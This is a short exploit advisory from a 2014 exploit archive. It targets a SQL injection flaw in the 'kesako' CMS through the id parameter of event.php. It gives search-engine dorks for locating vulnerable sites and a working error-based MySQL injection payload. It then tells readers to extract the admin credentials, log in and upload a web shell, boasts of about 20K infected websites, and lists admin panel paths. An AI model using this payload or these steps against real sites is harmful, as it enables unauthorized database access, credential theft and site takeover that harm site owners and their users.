kesako script SQL Injection
===================================================================
####################################################################
#.:. Exploit Title : kesako Script Sql Injection                  #
# .:. Author       : Microsoft-dz                                 #
#.:. Contact       : [[email protected]]                   #
#.:. Dork    : intext:powered by [kesako] inurl:/event.php?id=    #
#.:. Dork 2         : intext:powered by [kesako]                  #                
#.:. Tested on      : win&linux                                   #
#.:. Vendor's Website : http://www.kesako.ch/cms/                 #
#.:. Date           : [2014/5/19]                                 #
####################################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] www.site.com/modules/event.php?id=[SQL INJECTION]
[~] www.site.com/modules/event.php?id=[SQL INJECTION]
#########
P0C
#########
Type: String Mysql Injection
http://SITE/modules/event.php?id=[SQL INJECTION]
 
http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
####################################################################
1- Get Admin Infos
2- then login and upload your shell
Enjoy
About #20K Infected Websites :v
 
You Can Find The Admin Panel @ http://site/cms/admin
or http://site/cms/user/
or http://site/cms/login/
#########################################################################
Tnx: R3Z0Uk4
 
# 57D46D6A71E0A692   1337day.com [2014-05-25]   FE69654DDA317465 #